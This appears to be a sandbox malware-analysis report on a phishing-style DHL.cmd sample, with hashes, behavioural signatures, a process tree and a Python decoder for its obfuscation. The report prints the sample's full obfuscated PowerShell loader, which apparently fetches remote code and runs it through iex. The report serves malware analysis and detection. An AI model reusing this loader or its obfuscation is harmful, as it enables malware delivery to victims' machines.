Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 12-07-2024 09:37
Tasks
- Static task: static1
- Behavioral task behavioral1 (the run reported below; platform windows7_x64): Sample DHL.cmd, Resource win7-20240708-en, 5 signatures, 150 seconds
- Behavioral task behavioral2: Sample DHL.cmd, Resource win10v2004-20240709-en, 17 signatures, 150 seconds
General
- Target: DHL.cmd
- Size: 6KB
- MD5: 4fac338e225a33e53806bf2f27f3ed0e
- SHA1: 5e7f1620ebe0099e2c7014b2e725eefbdaecab85
- SHA256: 1825ea48164cc22c0872fea1d7ed7698d8ac439c8404207db2234cdc2b95f1ba
- SHA512: cdeee8abcf1153740d8d1c0cc82c23c2f4b71fb6335b4fa1c3c5bf4838a0186f8043b3b5223c8d13c62c777be7cb8df2ef12a617485cdf61c527e2d5f5888844
- SSDEEP: 192:YWFEaVQEQKcwglcCy6XnU/pTmAaelT2dvmf:ThuZXGCyWU/praeIdvW
- Score: 8/10
Malware Config
Signatures

- Blocklisted process makes network request (64 IoCs)
  Processes:
  flow      pid    process
  5 .. 68   3004   powershell.exe     (one row per flow, 64 flows in total, all from PID 3004)

- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
  pid    process
  3004   powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
  description               pid    process
  Token: SeDebugPrivilege   3004   powershell.exe

- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
  description                         pid    process          target process
  PID 2136 wrote to memory of 3004    2136   cmd.exe          powershell.exe   (recorded 3 times)
  PID 3004 wrote to memory of 2688    3004   powershell.exe   cmd.exe          (recorded 3 times)
Processes (tree; each entry gives image, command line, triggered signatures and PID)

[1] C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
    Signatures: Suspicious use of WriteProcessMemory
    PID: 2136

[2] child of PID 2136 (image path followed by the recorded command line):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"2⤵
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    PID: 3004
[3] child of PID 3004: C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
    PID: 2688
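Reading the second stage. The powershell.exe entry above carries the whole loader as one command line, and every meaningful string in it is hidden by a single trick. The function Bleens walks its argument from index 4 in steps of 5 and keeps one character per step: $Euforisering is built as 'SUBsTR'+'ing', the method name Substring spelled out in pieces, and $Truncus becomes 1 because $Truncus++ on an undefined variable yields 1 once ${host}.CurrentCulture is non-null. If that property were empty, $Truncus would stay $null, every Substring call would be given a zero length and the stage would decode to nothing, which is a cheap check that the script is running inside a real host. Eddied is ". (iex) (...)", so each Eddied (Bleens '...') statement decodes and executes one line. The Python below is an added example for this report, not code from the sample or from the sandbox; it reproduces Bleens statically so the stage can be read without executing it. It runs on four assignments copied verbatim from the command line above and cross-checks one of them against what the sandbox actually recorded: $Strombus decodes to exactly the /c argument of the cmd.exe child with PID 2688, $Gidseltageres decodes to iex, $Willowiness to the redirect operator and $Affaldsbrser171 to the header name User-Agent. The offset, step and width are parameters so the same decoder can be re-pointed at a variant that changes the constants.

```python
"""Static decoder for the character-picking obfuscation used by the
PowerShell stage in the DHL.cmd process tree above.

Added example for this report; not code from the sample or the sandbox.
The loader's Bleens($Nedrakkes) does, in effect:
    $Truncus = 1                      # $Truncus++ from $null
    for ($i = 4; $i -lt $Nedrakkes.Length - $Truncus; $i += 5) {
        $out += $Nedrakkes.Substring($i, $Truncus)   # via 'SUBsTR'+'ing'
    }
so every literal is a run of 5-character groups whose 5th character is the
payload and whose first four are filler.
"""
from __future__ import annotations

import re


def bleens(s: str, offset: int = 4, step: int = 5, width: int = 1) -> str:
    """Replicate Bleens without running PowerShell.

    Mirrors the loop above: start at `offset`, stop while i < len - width,
    advance by `step`, keep `width` characters each time.  Defaults are the
    sample's constants.
    """
    limit = len(s) - width
    return "".join(s[i:i + width] for i in range(offset, limit, step))


# One Bleens call with its single-quoted argument, optionally preceded by the
# variable it is assigned to.  PowerShell escapes ' inside '...' as '' (the
# sample never does, but it is handled so the regex does not stop early).
_CALL = re.compile(r"(?:(\$\w+)\s*=\s*)?Bleens\s+'((?:[^']|'')*)'")


def decode_script(text: str) -> list[tuple[str | None, str]]:
    """Decode every Bleens literal in a PowerShell command line.

    Returns (variable_name_or_None, decoded_text) in source order, so the
    second stage reads top to bottom; bare Eddied (Bleens '...') statements
    come back with None as the name.  Paste the full command line from the
    process tree into `text` to recover the whole stage.
    """
    return [(m.group(1), bleens(m.group(2).replace("''", "'")))
            for m in _CALL.finditer(text)]


# Fragment assembled from the powershell.exe command line in the report:
# four assignments copied verbatim, the statements between them dropped.
SCRIPT = (
    "$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';"
    "$Willowiness=Bleens 'Stet> ka ';"
    "$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';"
    "$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%"
    r"Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasm"
    "Dest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';"
)

# Command line of the cmd.exe child (PID 2688) as recorded in the process
# tree; the statically decoded $Strombus must reproduce its /c argument.
OBSERVED_CHILD = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"'


def decoded_matches_child(decoded: dict[str | None, str] | None = None) -> bool:
    """Cross-check the decoder against dynamic evidence.

    A mismatch means offset/step/width are wrong for this variant, or the
    literal lost characters when it was copied out of the report.
    """
    if decoded is None:
        decoded = dict(decode_script(SCRIPT))
    return f'/c "{decoded["$Strombus"]}"' in OBSERVED_CHILD


if __name__ == "__main__":
    for var, clear in decode_script(SCRIPT):
        print(f"{var or '<inline>'} -> {clear!r}")
    print("decoded $Strombus matches observed child cmd.exe:",
          decoded_matches_child())
```

Caveat before decoding from this page: in a few literals of the rendered command line (the one assigned to $Personifikationers137, for instance) runs of spaces were collapsed during extraction, so some of their 5-character groups are short by one and the output is shifted into garbage from that point on. Decode those from the raw command line the sandbox captured, not from the rendered text, and treat a failed cross-check like the one above as a signal to look for such damage before suspecting a changed algorithm.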